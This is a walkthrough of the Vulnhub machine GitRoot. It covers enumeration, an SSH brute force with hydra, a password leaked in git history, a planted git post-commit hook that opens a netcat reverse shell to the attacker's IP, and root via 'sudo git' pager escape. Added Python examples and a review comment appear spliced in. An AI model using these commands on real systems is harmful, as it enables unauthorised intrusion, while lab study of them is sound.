[VLN] GitRoot

Today we are going to hack the Vulnhub machine called GitRoot:1. You can download it from the following link: GitRoot

Video


Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.45
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 22:39 CEST
Nmap scan report for GitRoot.home (192.168.1.45)
Host is up (0.0025s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 bf:45:f6:b3:e3:ce:0c:69:18:5a:5b:27:e5:d3:9c:86 (RSA)
|   256 b5:d7:45:50:06:c4:e2:3c:28:52:b8:06:26:1f:de:b0 (ECDSA)
|_  256 27:f0:d0:21:13:30:9c:5e:f0:70:a1:d8:5c:a7:8f:75 (ED25519)
80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hey Jen
11211/tcp open  memcache?
| fingerprint-strings: 
|   RPCCheck: 
|_    Unknown command
1 service unrecognized despite returning data. If you know the service/version, 
please submit the following fingerprint at 
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port11211-TCP:V=7.80%I=7%D=6/5%Time=5EDAADBC%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,27,"\x81\0\0\0\0\0\0\x81\0\0\0\x0f\0\0\0\x02\0\0\0\0\0\0\0\0Unkn
SF:own\x20command");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.69 seconds
We take a look at the website http://192.168.1.45/ and see: Hey Jen, just installed wordpress over at wp.gitroot.vuln please go check it out! So we add wp.gitroot.vuln to /etc/hosts. While we're at it, we also add gitroot.vuln. Then we scan to see whether there are more subdomains.

sml@Cassandra:~$ gobuster vhost -u gitroot.vuln -w 
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:          http://gitroot.vuln
[+] Threads:      10
[+] Wordlist:     
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
===============================================================
2020/06/05 22:42:29 Starting gobuster
===============================================================
Found: repo.gitroot.vuln (Status: 200) [Size: 438]
Found: wp.gitroot.vuln (Status: 200) [Size: 10697]
===============================================================
2020/06/05 22:43:10 Finished
===============================================================
We find repo.gitroot.vuln, so we add it to /etc/hosts as well. We take a look to see whether there is anything interesting on this new subdomain.

sml@Cassandra:~$ gobuster dir -u repo.gitroot.vuln -w 
/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://repo.gitroot.vuln
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/07 23:21:35 Starting gobuster
===============================================================
/.git/HEAD (Status: 200)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/index.php (Status: 200)
/javascript (Status: 301)
/manual (Status: 301)
/server-status (Status: 403)
===============================================================
2020/06/07 23:21:39 Finished
===============================================================
We see that the /.git directory exists. A .git directory almost always has the same file layout, so knowing this we visit http://repo.gitroot.vuln/.git/index and download it. We check whether anything in it is of interest...

sml@Cassandra:~/Descargas$ strings index
DIRC
D33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
GkL^
get.php
        index.php
3K*P'cg
pablo_HELP.txt
v;T&w^
set.php
GkL^
        stats.php
TREE
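The `strings` dump above is a quick look, but the index is a binary table, and `strings` mixes in bytes that are not file names: the stray "D" in front of the long .txt name is the low byte of that entry's flags field (the name length, 68 = 0x44 = "D"), and lines like "GkL^" are pieces of blob SHA-1s. The following reader, added here as an example and not part of the original write-up, decodes a version 2 or 3 index properly (path, mode and blob hash per entry) and verifies the trailing SHA-1 checksum, so you can tell whether a downloaded index is complete and what an exposed .git directory is actually leaking. The sample index it parses by default is constructed in the script from the file names seen above; the blob hashes in it are arbitrary, not the real ones.

```python
"""Reader for git's binary index file (".git/index", format v2/v3).

Added example, not part of the original write-up. The sample index built by
sample_index() is constructed here from the file names in the strings dump;
its blob hashes are made up.
"""
import hashlib
import struct
import sys

HEADER = struct.Struct(">4sII")          # signature "DIRC", version, entry count
ENTRY_FIXED = struct.Struct(">10I20sH")  # 10 stat fields, blob SHA-1, flags: 62 bytes


def parse_index(data: bytes) -> dict:
    """Return version, entry count, checksum status and (path, mode, sha1) entries."""
    if len(data) < HEADER.size + 20:
        raise ValueError("too short to be a git index")
    sig, version, count = HEADER.unpack_from(data, 0)
    if sig != b"DIRC":
        raise ValueError("bad signature %r" % sig)
    if version not in (2, 3):
        raise ValueError("index v%d not supported (v4 prefix-compresses paths)" % version)
    # The last 20 bytes are a SHA-1 over everything that precedes them.
    checksum_ok = hashlib.sha1(data[:-20]).digest() == data[-20:]
    entries = []
    pos = HEADER.size
    for _ in range(count):
        fields = ENTRY_FIXED.unpack_from(data, pos)
        mode, sha1, flags = fields[6], fields[10], fields[11]
        fixed = ENTRY_FIXED.size
        if version == 3 and flags & 0x4000:   # v3: an extra 16-bit extended-flags word
            fixed += 2
        name_len = flags & 0x0FFF             # low 12 bits of flags = path length
        start = pos + fixed
        if name_len < 0x0FFF:
            name = data[start:start + name_len]
        else:                                  # very long path: scan to the NUL terminator
            name = data[start:data.index(b"\x00", start)]
        entries.append((name.decode("utf-8", "replace"), mode, sha1.hex()))
        # Each entry is padded with 1..8 NUL bytes to a multiple of 8 bytes.
        pos += ((fixed + len(name)) // 8 + 1) * 8
    return {"version": version, "count": count,
            "checksum_ok": checksum_ok, "entries": entries}


def build_index(paths, version=2) -> bytes:
    """Construct a well-formed index for the given paths (sample data only)."""
    paths = sorted(paths)  # git keeps index entries sorted by path bytes
    body = HEADER.pack(b"DIRC", version, len(paths))
    for path in paths:
        name = path.encode()
        fake_blob = hashlib.sha1(name).digest()  # placeholder, not a real blob id
        entry = ENTRY_FIXED.pack(0, 0, 0, 0, 0, 0, 0o100644, 1000, 1000, 0,
                                 fake_blob, min(len(name), 0x0FFF)) + name
        entry += b"\x00" * (8 - len(entry) % 8)  # 1..8 NULs of padding
        body += entry
    return body + hashlib.sha1(body).digest()


# Constructed sample: the file names visible in the strings dump above.
SAMPLE_PATHS = [
    "33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt",
    "get.php", "index.php", "pablo_HELP.txt", "set.php", "stats.php",
]


def sample_index() -> bytes:
    return build_index(SAMPLE_PATHS)


if __name__ == "__main__":
    # Usage: python index_reader.py [/path/to/downloaded/index]
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_index()
    info = parse_index(raw)
    print("index v%d, %d entries, checksum %s"
          % (info["version"], info["count"], "ok" if info["checksum_ok"] else "BAD"))
    for path, mode, sha in info["entries"]:
        print("%06o %s %s" % (mode, sha, path))
```

Run it against the downloaded index instead of the built-in sample by passing the file path as the first argument; a "BAD" checksum means the download was truncated or the file is not really an index.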
The file pablo_HELP.txt exists, so we brute-force the user pablo.

sml@Cassandra:~$ hydra -l pablo -P FU.txt 192.168.1.140 ssh -I
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 
12:18:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent 
overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try 
per task
[DATA] attacking ssh://192.168.1.140:22/
[22][ssh] host: 192.168.1.140   login: pablo   password: mastergitar
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 
12:18:33

Low Shell


We connect over ssh as "pablo" with the password we obtained, "mastergitar" :)

sml@Cassandra:~/$ ssh pablo@192.168.1.180
pablo@GitRoot:~$ ls
public  user.txt
pablo@GitRoot:~$ cat user.txt

  _______ _                 _                          _____      _     _       
 |__   __| |               | |                        |  __ \    | |   | |     
    | |  | |__   __ _ _ __ | | __  _   _  ___  _   _  | |__) |_ _| |__ | | ___  
    | |  | '_ \ / _` | '_ \| |/ / | | | |/ _ \| | | | |  ___/ _` | '_ \| |/ _ \ 
    | |  | | | | (_| | | | |   <  | |_| | (_) | |_| | | |  | (_| | |_) | | (_) 
    |_|  |_| |_|\__,_|_| |_|_|\_\  \__, |\___/ \__,_| |_|   \__,_|_.__/|_|\___/ 
                                    __/ |                                       
                                   |___/                                        



Great job! Do not falter, there is more to do. You made it this far, finish the 
race!

"It's not that I'm so smart. Its just that I stay with problems longer." - 
Albert Einstein 

8a81007ea736a2b8a72a624672c375f9ac707b5e
We explore a bit more...

pablo@GitRoot:~$ cd public
pablo@GitRoot:~/public$ ls -l
total 4
-rw-r--r-- 1 beth beth 58 May 25 23:08 message.txt
pablo@GitRoot:~/public$ cat message.txt 
Hey pablo

Make sure to check-out our brand new git repo!
We see that "beth" left us a message telling us to check out the new git repository. We look for it.

pablo@GitRoot:~/public$ find / -name .git 2>/dev/null
/opt/auth/.git
/var/www/repo/.git
The new repository she is talking about is /opt/auth/.git. We take a look at all the changes that have been made to it over time.

pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ cat *
----SNIP----
0000000000000000000000000000000000000000 
fc9901f3b6b303d6ad40cdb71689f1646904f7b3 Your Name  1590499965 
-0400  branch: Created from HEAD
fc9901f3b6b303d6ad40cdb71689f1646904f7b3 
b2ab5f540baab4c299306e16f077d7a6f6556ca3 Your Name  1590500014 
-0400  commit: init repo
b2ab5f540baab4c299306e16f077d7a6f6556ca3 
06fbefc1da56b8d552cfa299924097ba1213dd93 Your Name  1590500148 
-0400  commit: added some stuff
----SNIP----

pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ git show 
06fbefc1da56b8d552cfa299924097ba1213dd93
commit 06fbefc1da56b8d552cfa299924097ba1213dd93
Author: Your Name 
Date:   Tue May 26 09:35:48 2020 -0400

    added some stuff

diff --git a/main.c b/main.c
index 70e6397..8af9b9c 100644
--- a/main.c
+++ b/main.c
@@ -4,6 +4,15 @@
 int main(){
 
         char pass[20];
-       return 0;
+        scanf("%20s", pass);
+        printf("You put %s\n", pass);
+        if (strcmp(pass, "r3vpdmspqdb") == 0 ){
+                char *cmd[] = { "bash", (char *)0 };
+                execve("/bin/bash", cmd, (char *) 0);
+        }
+        else{
+                puts("BAD PASSWORD");
+        }
+        return 0;
 }
-//43
+
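Review bot: the check `if (strcmp(pass, "r3vpdmspqdb") == 0 ){` embeds the credential as a string literal, so it ships in every clone and stays in the repository history even after it is changed, which is exactly how it is recovered later in this write-up; read the secret from a file or environment variable with restricted permissions, or compare against a stored hash, and rotate the password now that it is in history. Separately, `scanf("%20s", pass);` into `char pass[20];` accepts 20 characters and then writes the terminating NUL one byte past the buffer; the width must be `%19s` for a 20-byte array.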
We see that in one commit there is what could be beth's password. We try it :)

pablo@GitRoot:/tmp/j$ su beth
Password: r3vpdmspqdb
beth@GitRoot:~$ id
uid=1001(beth) gid=1001(beth) groups=1001(beth)
Now that we have beth's privileges, we explore a bit.

beth@GitRoot:~$ cd ~
beth@GitRoot:~$ cd public
beth@GitRoot:~/public$ ls -l
total 4
-rw-r--r-- 1 jen jen 151 May 26 00:29 addToMyRepo.txt
beth@GitRoot:~/public$ cat addToMyRepo.txt 
Hello Beth

If you want to commit to my repository you can add a zip file to 
~jen/public/repos/ and ill unzip it and add it to my repository

Thanks!
In this case it seems "jen" wants us to leave a zip file in the folder she indicates, and she will unzip it and add it to her repository. We are going to play with git "hooks" and create a post-commit hook, so that it runs after jen makes her commit. In our case we will create a reverse shell.

beth@GitRoot:~/public$ cd /tmp
beth@GitRoot:~/tmp$ mkdir -p .git/hooks
beth@GitRoot:~/tmp$ cd .git/hooks
beth@GitRoot:~/tmp/.git/hooks$ nano post-commit
And inside the post-commit file we put:

#!/bin/sh
/usr/bin/nc -e /bin/bash 192.168.1.148 5555
We give it permissions, compress it and put it where jen needs it.

beth@GitRoot:~/tmp/.git/hooks$ chmod 777 post-commit
beth@GitRoot:~/tmp/.git/hooks$ chmod +x post-commit
beth@GitRoot:~/tmp/.git/hooks$ cd /tmp
beth@GitRoot:~/tmp$ 7z a yo.zip .git/
beth@GitRoot:~/tmp$ chmod 777 yo.zip
beth@GitRoot:~/tmp$ cp yo.zip /home/jen/public/repos
We start our nc listener on our machine.

sml@Cassandra:~$ nc -nlvp 5555
After a while...

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.80] 52104
python -c 'import pty; pty.spawn("/bin/bash")'
$ id
uid=1003(jen) gid=1003(jen) groups=1003(jen)
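The whole step works because jen unzips whatever lands in ~jen/public/repos/ straight into her repository, so a .git/hooks/post-commit inside the archive becomes her hook and runs with her privileges on her next commit. Hooks are not the only thing that lives there: .git/config can also point git at commands. The check below is the one jen was missing, added here as an example and not part of the original write-up: it lists the archive members and refuses to extract if any one of them escapes the destination directory or has a path component named ".git". The archives it audits are constructed in memory; the hook body is a harmless placeholder comment, not the reverse shell from the write-up.

```python
"""Vet a contributed zip archive before unzipping it into a git working tree.

Added example, not from the original write-up. The sample archives are
constructed in memory; none of their contents come from the machine.
"""
import io
import posixpath
import zipfile


def audit_zip(zip_bytes: bytes) -> list:
    """Return (member, reason) pairs for members that must not be extracted.

    Rules: no absolute paths or '..' escapes, and no path component named
    '.git'. A contributor never needs to ship repository metadata; hooks and
    config both live there and both can make git run commands."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")
            norm = posixpath.normpath(name)
            if name.startswith("/") or norm == ".." or norm.startswith("../"):
                findings.append((info.filename, "path escapes the extraction directory"))
                continue
            if ".git" in norm.split("/"):
                findings.append((info.filename, "git metadata (hooks/config) inside archive"))
    return findings


def safe_extract(zip_bytes: bytes, dest: str) -> int:
    """Extract only if the audit is clean; returns the number of members written."""
    findings = audit_zip(zip_bytes)
    if findings:
        raise ValueError("refusing to extract: %r" % findings)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return len(zf.namelist())


def build_sample(members: dict) -> bytes:
    """Construct an in-memory zip from a {member name: text content} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(zipfile.ZipInfo(name), content)  # ZipInfo keeps '..' untouched
    return buf.getvalue()


# Constructed samples: a clean contribution, one carrying a hook, one with traversal.
CLEAN = {"src/main.c": "int main(void) { return 0; }\n"}
HOOKED = dict(CLEAN, **{
    ".git/hooks/post-commit": "#!/bin/sh\n# placeholder: anything here runs as whoever commits\n",
})
ESCAPE = {"../.bashrc": "# placeholder: would land outside the repo\n"}


if __name__ == "__main__":
    for label, members in (("clean", CLEAN), ("hooked", HOOKED), ("escape", ESCAPE)):
        print(label, audit_zip(build_sample(members)) or "ok")
```

Run it and the "hooked" archive is reported on its .git/hooks/post-commit member while the clean one passes; wire `safe_extract` in front of `unzip` (or simply never extract into the repository directory itself) and the hook never reaches jen's .git/hooks.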
Now that we are "jen" we explore the system a bit. We see she has the file ~/.viminfo, which contains something that could be her password...

jen@GitRoot:~$ cd ~
jen@GitRoot:~$ cat .viminfo
---SNIP---
# This viminfo file was generated by Vim 8.1.
# Search String History (newest to oldest):
?/binzpbeocnexoe
|2,1,1590471908,47,"binzpbeocnexoe"

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
---SNIP----
Let's see what we can do with sudo, using the possible password from the .viminfo file.

Privilege Escalation



jen@GitRoot:~$ sudo -l    
[sudo] password for jen: binzpbeocnexoe

Matching Defaults entries for jen on GitRoot:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jen may run the following commands on GitRoot:
    (ALL) /usr/bin/git
It seems to work :) Good, we can use "sudo git", which lets us escalate privileges. So...

sudo git -p help config
!/bin/sh

#cd /root
# ls
passwords  POC  root.txt  setpasswords.php
# cat root.txt        
Thank you for completing my box! Please let my know what you liked and what you 
didn't like at my twitter @Recursive_NULL

734ae32be131cd0681f86c03858f4f587a3c69ce

End


And with this we are root on the machine :)